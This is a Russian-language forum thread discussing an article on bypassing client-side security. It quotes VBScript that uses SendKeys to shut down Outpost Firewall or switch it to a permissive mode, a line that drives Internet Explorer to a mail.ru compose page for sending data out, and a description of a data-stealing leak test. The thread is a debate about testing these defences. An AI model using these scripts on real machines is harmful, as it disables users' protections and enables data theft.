Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 След.
RSS
Обход средств защиты клиентских приложений
 
Отличная статья ! |2anonymous|

<БУРНЫЕ ПРООДОЛЖИТЕЛЬНЫЕ ВОПЛИ С ПОСЛЕДУЮЩИМ ВСЕНОРОДНЫМ СОЖЖЕНИЕМ ВСЕХ ФАЙРОВОЛОВ И ПОНОШЕНИЕМ ВИНДОВС ЗАВЕРШАЮЩИЕСЯ ГРУППОВЫМ ИЗНАСИЛОВАНИЕМ ОСЛИКА IЁ>
 
Материал хороший, примечательно еще то, что впервые он попал комне как рассвылка от SecuriTeam :) Еще более приятно, автора теже... Толькот, по поводу таких речей я уже слышал(причем от русских) и не поленился найти:
http://www.xakep.ru/post/21858/default.asp

Правда примеры не на Хост скриптах... Учитывая то, что Internet Explorer иожет дать "My Computer zone" ( не "Local Zone" !!! ) Это хорошие игрушки для троянов-роботов... Молодца, 5 с пюсом...
 
Какое-то наукообразное словоблудие.

<КРАТКОЕ СОДЕРЖАНИЕ ПРЕДЫДУЩИХ СЕРИЙ>
До тех пор, пока возможно исполнение на клиентской стороне загружаемого кода, о безопасности можно забыть.
</КРАТКОЕ СОДЕРЖАНИЕ ПРЕДЫДУЩИХ СЕРИЙ>

<РЕЗЮМЕ>
1. Вечная слава тому, кто первый придумал встраивание в HTML скиптов!
2. Еще большая слава тому, кто после первого, придумал, что почту можно отправлять в HTML формате!
</РЕЗЮМЕ>
 
Цитата
Guest пишет:
До тех пор, пока возможно исполнение на клиентской стороне загружаемого кода, о безопасности можно забыть.

Немного не так.
Пока будут использоваться традционные методы защиты клиентов, выполнение кода на стороне клиента будет весьма серьезной проблеммой.

Всех в песочницу! Всех в сад!
 
Цитата
Guest пишет:
<РЕЗЮМЕ>
1. Вечная слава тому, кто первый придумал встраивание в HTML скиптов!
2. Еще большая слава тому, кто после первого, придумал, что почту можно отправлять в HTML формате!
</РЕЗЮМЕ>

Да не нужны, по болшому счету, эти скриты. Во всех браузерах (кроме, разве что, lynx) за последние пару месяцев обнаружились какие переполнения буфера при обработке картинок...

Разработчиков "неуявзимого" The Bat! больше года пришлось трясти чтобы они перешли на недырявую версию libpng... Ну нельзя ожидать неуязвимости от _любого_ приложения, в том же lynx переполнения буфера находились...
 
Цитата
anonymous пишет:
 Разработчиков "неуявзимого" The Bat! больше года пришлось трясти чтобы они перешли на недырявую версию libpng...

Гыыыыыыы.... А они ее так и не поменяли... В 2.04.7 на тестовой картинке все тот же красиво перехваченный exception и libng 1.0.5 от 1999 года :))) Хотя внешне, естественно, все нормально :))
 
<Emmotions>
<RESPECT/>
<APPLAUDS/>
<SAD VALUE="Тема безусловно интересная, но описано поверхностно"/>
<AGREE VALUE="Песочница рулит" />
<EGG VALUE="Тухлое" THROWN="False"/>
</Emmotions>
 
А вот в Опере алерты не выскакивают!
Да вообще: из-за этого IE XSS выполняется там где его ну никак не должно быть :))
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Спасибо за статью.
У меня вопрос к авторам (или просто к знающим людям).
По поводу CAT.
Каким образом(откуда) вы взяли это случайное число
r = int(rnd()*10000+1000)
Для написания письма mail.ru
использует это (псевдо)случайное число. Авторы его подобрали(взяли?) точно, НО
если пользователь уже недавно был на mail.ru
то эта служба запоминает(меняет) для него случайное число(rand оказывается сдвинут)и функция отправки
IE.Navigate("http://win.mail.ru/cgi-bin/sendmsg?compose&"&r) не работает.
ОТсюда два вопроса:
Как бороться с этим?
И каким образом авторы подобрали(взяли) закон изменения числа???
 
от фонаря :-)

mail.ru специально был взят, что бы напрактике именно этот пример было тяжко использовать, ибо он тяжел по объемам, тормознут и спамофильтручетеряющ письма.
В практике лучше использовать другие почтовые (или не почтовые серверы).
 
<ТИПА ЦИТАТА>
Сценарий выгрузки Outpost

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"

Сценарий переключает Outpost в "мягкий" режим

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"

       WScript.Sleep 10
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       WShell.SendKeys "n"
</КОНЕЦ ТИПА ЦИТАТЕ>

А слабо если пароль стоит?

Между прочим с хорошо настроенным фаерволом ниодин из приведенных скриптов нипрокатил. Даже при отключонном аутпосте опера 7.51 ничего не выполнела.... Отсюда вывод статья нифиль полный... Ну конечно я не исключаю что ни у каждого соит фаирвол или опера ну всетаки подобного типа статей и инете хватает на любых языках. На security.nnov.ru я так и написал...
 
Цитата
censore пишет:
А слабо если пароль стоит?
Не слабо. На момент написания статьи outpost 2.5 в режиме обучения (типичном) даже с установленным паролем не запрашивал пароля

Цитата
censore пишет:

Между прочим с хорошо настроенным фаерволом ниодин из приведенных скриптов нипрокатил.

На момент написания статьи сосали все кроме eeye blink.
Только в CAT надо 5 строк добавить было, что не делалось принципиально. Если не веришь - спроси у разработчиков outpost или подними fido7.ru.security

Цитата
censore пишет:

Даже при отключонном аутпосте опера 7.51 ничего не выполнела....

а при чем здесь опера?
 
Цитата
топец пишет:
Цитата
censore пишет:
А слабо если пароль стоит?

Не слабо. На момент написания статьи outpost 2.5 в режиме обучения (типичном) даже с установленным паролем не запрашивал пароля
2.5 стоял у меня до версии 2.51 и тем не менее в режиме обучения он пароль требовал. так как на то время кажется на security.nnov.ru была статья про обход защиты фо многих фаирволах на себе я проэксперементировал непрокатило так как пароль стоял. Попробуй перепроверь на себе ведь всетаки может настройки идут дефолтовские потому и не просить пароль при закрытии.

Цитата
censore пишет:

Между прочим с хорошо настроенным фаерволом ниодин из приведенных скриптов нипрокатил.

На момент написания статьи сосали все кроме eeye blink.
Только в CAT надо 5 строк добавить было, что не делалось принципиально. Если не веришь - спроси у разработчиков outpost или подними fido7.ru.security

Цитата
censore пишет:

Даже при отключонном аутпосте опера 7.51 ничего не выполнела....

а при чем здесь опера?

а при том что если юзер лазить по инету через оперу то выше приведенные скрипты не покатят, хотя я не ручаюсь может у меня proxy  фильтрует выполнение вредоносных скриптов... А хотя нет нефильтрует.. так что статья расчитана на то что у юзера стоит фаирвол с дефолтовыми настройками и лазить юзер по инету через IE
 
Цитата
[censore пишет:
] <ТИПА ЦИТАТА>
Сценарий выгрузки Outpost

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"

Сценарий переключает Outpost в "мягкий" режим

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"

       WScript.Sleep 10
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       WShell.SendKeys "n"
</КОНЕЦ ТИПА ЦИТАТЕ>

А слабо если пароль стоит?

Между прочим с хорошо настроенным фаерволом ниодин из приведенных скриптов нипрокатил. Даже при отключонном аутпосте опера 7.51 ничего не выполнела.... Отсюда вывод статья нифиль полный... Ну конечно я не исключаю что ни у каждого соит фаирвол или опера ну всетаки подобного типа статей и инете хватает на любых языках. На security.nnov.ru я так и написал...

Не поможет и твой Аутпост, смотри
http://www.izcity.com/data/security/article853.htm
 
Кстати при платежах при помощи кредитной карточки, всю секретную информацию можно можно получить простым скриншотом (ужас) вот вам и https и ssl, а защиты нет, пароли в email хоть звездочками закрыты.
 
Можно назвать этот вариант "Вариантом тихого ужаса". Почему? Не поленитесь теперь нажать на кнопку View Report и посмотреть на украденную с вашего компьютера информацию :-). Уверен, вы ОЧЕНЬ удивитесь, после того, как, нажав на кнопку View Report и перейдя на страницу в интернете, увидите там: имя вашего компьютера, IP-адрес, список файлов, находящихся в папке Мои документы, и список подпапок в этой папке (смотрите заботливо выделенные жирным шрифтом названия подпапок и сравнивайте их с содержимым Мои документы). Кроме того, тут можно увидеть "изюминку": скриншот окна программы, в котором вы набирали какой-либо текст при прохождении теста (точнее, скриншот не только этого окна, а всего экрана, включая Панель задач). Теперь, представьте, что вы не проходили тест, а переводили через интернет деньги :-). Все приведённые выше данные я увидел, проходя тест pcAudit без включённого файрволла. Полюбовавшись на всё это великолепие, не забудьте нажать на кнопку Delete pege! на этой веб-страничке, чтобы удалить эту информацию с сервера программы-теста.

Тест пройден успешно так все вышеперечисленное чушь
1.) Имя компьютера, можно узнать вспомошью яваскрипта прям на той-же странице (кстате он там есть)
2.) Айпишник через РНР ($_SERVER[REMOTE_ADDR])
3.) мои документы он можно сказать не прочитал так как их у меня их небыло а потом резко появились неизвестно откуда. да даже еслибы и были первоночально тогда листинг директории можно было бы получить тем же скриптом но предварительно создать через CMD и записать в фаил все содержимое
4.) Скриншот сохранялся в папке с виндой а потом просто при загрузки страницы открывался в окне браузера
5.) все перечисленное на той станице полная херня. так как перед началом теста я открыл ENT и аутпост и они незаметили никаких открытых портов.



******************************************

Да и кстате насчет случая с просмотром паролей мне как то раз поподался исходник на VB6 довольно прикольный он за пару секунд все пароли показывал какие в винде хранятся от почтовика до пароля на вход в винду любого пользователя....... вот так то....
 
Цитата
[censore пишет:
] Можно назвать этот вариант "Вариантом тихого ужаса". Почему? Не поленитесь теперь нажать на кнопку View Report и посмотреть на украденную с вашего компьютера информацию :-). Уверен, вы ОЧЕНЬ удивитесь, после того, как, нажав на кнопку View Report и перейдя на страницу в интернете, увидите там: имя вашего компьютера, IP-адрес, список файлов, находящихся в папке Мои документы, и список подпапок в этой папке (смотрите заботливо выделенные жирным шрифтом названия подпапок и сравнивайте их с содержимым Мои документы). Кроме того, тут можно увидеть "изюминку": скриншот окна программы, в котором вы набирали какой-либо текст при прохождении теста (точнее, скриншот не только этого окна, а всего экрана, включая Панель задач). Теперь, представьте, что вы не проходили тест, а переводили через интернет деньги :-). Все приведённые выше данные я увидел, проходя тест pcAudit без включённого файрволла. Полюбовавшись на всё это великолепие, не забудьте нажать на кнопку Delete pege! на этой веб-страничке, чтобы удалить эту информацию с сервера программы-теста.

Тест пройден успешно так все вышеперечисленное чушь
1.) Имя компьютера, можно узнать вспомошью яваскрипта прям на той-же странице (кстате он там есть)
2.) Айпишник через РНР ($_SERVER[REMOTE_ADDR])
3.) мои документы он можно сказать не прочитал так как их у меня их небыло а потом резко появились неизвестно откуда. да даже еслибы и были первоночально тогда листинг директории можно было бы получить тем же скриптом но предварительно создать через CMD и записать в фаил все содержимое
4.) Скриншот сохранялся в папке с виндой а потом просто при загрузки страницы открывался в окне браузера
5.) все перечисленное на той станице полная херня. так как перед началом теста я открыл ENT и аутпост и они незаметили никаких открытых портов.

....
а как ты объяснишь, что они эту информацию тебе не email могут прислать
 
Цитата
Klein пишет:
а как ты объяснишь, что они эту информацию тебе не email могут прислать

Мне они ничего не присылали так как ни одного пакета с компа не прошло...
 
Скрипт конечно полезный  [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG] , но NAV 2005 ,блокирует его ! Брово Norton !
 
FireFox 1.0 пропустил только тест № 7. Добавление The Proxomitrona закрыло и эту брешь. А вот IE даже в связке с outpostom 2.5, (без The Proxomitrona)выполнил половину приведенных тестов.
Вывод: Outpost годится только для контроля выходного трафика, когда сразу можно засечь, что кто-то левый пытается выйти в инет.
Страницы: Пред. 1 2 3 След.
Читают тему